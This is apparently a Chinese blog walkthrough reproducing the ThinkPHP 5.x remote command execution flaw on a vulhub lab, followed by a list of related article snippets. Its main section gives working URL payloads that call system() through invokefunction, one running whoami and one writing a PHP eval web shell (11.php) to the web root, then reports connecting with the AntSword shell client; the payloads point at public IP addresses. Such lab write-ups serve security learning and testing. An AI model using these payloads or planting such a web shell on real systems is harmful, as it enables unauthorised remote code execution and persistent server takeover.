Thinkphp(TP)框架漏洞攻略

原创 于 2025-03-24 21:54:47 发布
· 310 阅读 · 2 ·
版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#android #中间件 #tomcat #服务器 #网络

Thinkphp5x远程命令执⾏及getshell

境配

服务121.40.229.129:8080

靶场vulhub/thinkphp/5-rce

docker-compose up -d #启动环

访问靶场http://121.40.229.129:8080/

远程命令执

http://39.105.61.160:8080/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

 根⽬录⽣成11.php ⽂件

http://39.105.61.160:8080/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20%22%3C?php%20@eval(\$_POST[cmd]);?%3E%22%20%3E11.php

 使用蚁剑连接成功

ThinkPHP 多语言模块RCE漏洞复现
0xSec
12-25 3889
ThinkPHP,是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。最早诞生于2006年初,2007年元旦正式更名为ThinkPHP,并且遵循Apache2开源协议发布。ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重易用性。并且拥有众多原创功能和特性,在社区团队的积极参与下,在易用性、扩展性和性能方面不断优化和改进。
【常见框架漏洞Thinkphp(TP)、 struts2 、Spring、Shiro
m0_59151303的博客
08-07 1496
ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的,是一个快速、兼容而且简单的轻量级国产PHP开发框架,诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP,遵循Apache2开源协议发布,从Struts结构移植过来并做了改进和完善,同时也借鉴了国外很多优秀的框架和模式,使用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式。
thinkphp5.0.23命令执行-靶场复现
m0_66376444的博客
04-19 1198
ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。在大于5.0.21小于等于5.0.23的情况下,由于修改了method函数的逻辑,无法随意用变量,这里统一用只能用get[],route[]。命令执行成功,可以看出是windows,所以我用nc来拿shell。本次测试版本:thinkphp5.0.23。三、thinkphp总述。
Thinkphp常见漏洞利用
未完成的歌~的博客
04-14 4337
ThinkPHP是一个开源,快速、简单的轻量级国产PHP开发框架,诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP。使用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式。ThinkPHP可以支持windows/Unix/Linux等服务器环境,正式版需要PHP 5.0以上版本,支持MySql、PgSQL、Sqlite多种数据库以及PDO扩展,是一款跨平台,跨版本以及简单易用的PHP框架
PHP 开发 框架安全:ThinkPHP 序列 漏洞测试.
ZL_1618的博客
11-14 1801
本身不断更新和改进,以应对新的安全威胁和漏洞。什么是 ThinkPHP 框架.ThinkPHP 框架的安全特性:开启 漏洞 靶场:(1)查看目录:(2)启用 vulhub 漏洞:(3)进行浏览:主机的 8080 端口.进行 漏洞 测试:(1)查看是不是 ThinkPHP 框架.(查看数据包的信息)(2)如果知道他是这个漏洞,则可以自己使用工具进行测试。(3)漏洞的利用:(4)使用连接工具(蚁剑)进行连接.
thinkphp -5rce漏洞复现(保姆级教程)
最新发布
2401_87057954的博客
12-02 1440
不过kali的刷新率一般都是60赫兹所以有点卡顿。打开网页后输入kali的ip:8080即可。docker ps -a查看是否启动环境。1)在url输出关于 PHP 配置的信息。一定要进入该目录下才可以搭建靶场哦。完成以上操作后开始复现漏洞。之后查看shell.php。注意端口号是8080。
tp5漏洞利用工具.zip
01-03
标题中的“tp5漏洞利用工具.zip”指的是一个包含利用ThinkPHP5框架中安全漏洞的工具包,这个压缩包主要用于测试和展示ThinkPHP5代码执行漏洞的利用方式。描述提到,这个工具包含了两种方法,用于在目标系统上检测并...
基于ThinkPHP5.1框架开发的强大后台管理系统源码
09-29
值得注意的是,虽然ThinkPHP5.1框架具备许多内置功能,但开发人员仍需注意安全实践,如定期更新框架和依赖库以修复已知的安全漏洞,实现适当的数据验证和清洗以防止SQL注入、XSS攻击等,确保系统的整体安全。...
thinkphp5.1.39、tp5.1.39版本
06-01
ThinkPHP5.1.39,简称tp5.1.39,是ThinkPHP框架的一个重要版本,它在原有的基础上进行了多方面的优化和改进,旨在提供更高效、稳定且易于使用的开发环境。本文将对这个版本的特性、优势以及常见应用进行详尽的探讨。...
常见的框架漏洞
m0_75036923的博客
09-23 1092
环境配置靶场:vulhub/thinkphp/5-rcedocker-compose up -d #启动环境访问靶场:http://172.16.1.4:8080/index.php远程命令执行POC:远程代码执行POC:getshell?>" >>1.php根目录生成1.php 文件,输出phpinfo。
vulhub靶场thinkphp漏洞复现
weixin_44300286的博客
03-08 1697
0x01、ThinkPHP 2.x 任意代码执行漏洞 原理 ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由: $res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths)); 导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞ThinkPHP 3.0版本因为Lite模式下没有修复该漏洞,也存在这个漏洞漏洞复现 直接
网盾安全学院综合靶场-ThinkPHP5 远程代码执行漏洞通关功略
m0_54360887的博客
02-24 3546
漏洞概述 我们知道在ThinkPHP5中是有远程代码执行漏洞的。这个漏洞由于框架对控制器名未能进行足够的检测,攻击者利用该漏洞对目标网站进行远程命令执行攻击。 write up 靶场地址:http://ctf.wangdun.cn 靶场信息: 影响范围 ThinkPHP 5.0.全版本 这个漏洞在测试当中发现该漏洞并不通杀,还是得看复现的版本,目前所测试的情况如下: 当前映射80端口为47052,我们访问该地址 我们可以构造payload来测试下命令执行漏洞: ..
[Vulhub] ThinkPHP漏洞合集
weixin_45605352的博客
05-11 3009
0x01 复现环境 攻击机:kali linux,Windows 10 x64 靶机:XXE(下载链接https://www.vulnhub.com/entry/xxe-lab-1,254/) 网络设置:均为桥接模式 0x02 漏洞复现 主机发现&端口扫描 先确定靶机ip地址,这里用arp-scan -l命令探测内网: 发现靶机地址为192.168.43.228,接下来用nmap -sV -p- 192.168.43.228 扫描一下: -sV:探测端口服务版本;-p:指定端口;-v:显示扫描过
【web攻防】ThinkPHP5.0.23 远程代码执行漏洞Thinkphp5.0.22/5.1.29远程代码执行漏洞 (Remote Code Execution)安鸾靶场练习
AAAAAAAAAAAA66的博客
12-30 2306
中华人民共和国网络安全法(出版物)_360百科中华人民共和国网络安全法,《中华人民共和国网络安全法》是为保障网络安全,维护网络空间主权和国家安全、社会公共利益,保护公民、法人和其他组织的合法权益,促进经济社会信息化健康发展而制定的法律。《中华人民共和国网络安全法》由中华人民共和国第十二届全国人民代表大会常务委员会第二十四次会议于2016年11月7日通过,自2017年6月1日起施行。https://baike.so.com/doc/24210940-24838928.html 目录 靶场地址 Thi
ThinkPHP5.0.23 远程代码执行漏洞
cyzCc的博客
02-15 5696
靶场地址【安鸾渗透实战平台】http://www.whalwl.cn:8031 提示:flag在服务器根目录 直接在kali里面搜索ThinkPHP5.0.23相关漏洞 发现了 Remote Code Execution(远程代码执行漏洞) 将该漏洞cp到tp.txt文件并查看 在最下面发现该版本payload (post)public/index.php?s=captcha (data) ...
thinkphp漏洞_ThinkPHP5.0 远程代码执行漏洞
weixin_39634579的博客
11-25 278
漏洞介绍ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源MVC框架,简单来说就是Thinkphp处理请求的关键类为Request(thinkphp/library/think/Request.php这个类可以处理http请求设置但此框架支持表单伪装变量,通过伪装变量实现任意函数的调用影响版本5.0全版本复现环境Vulhub漏洞靶场vulhub-master/thinkphp...
ThinkPHP漏洞总结(利用)
热门推荐
yangbz123的博客
04-26 1万+
ThinkPHP介绍 ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架,诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP,遵循Apache2开源协议发布,从Struts结构移植过来并做了改进和完善,同时也借鉴了国外很多优秀的框架和模式,使用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式。 ...
thinkPHP漏洞检测工具Tp_Attack_GUI使用指南
- Tp_Attack_GUI:一个专门针对ThinkPHP框架漏洞检测和攻击工具,通常以图形用户界面(GUI)的形式出现,便于使用者进行漏洞扫描和攻击测试。该工具会尝试识别出ThinkPHP应用程序的安全漏洞,并可能提供测试漏洞的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值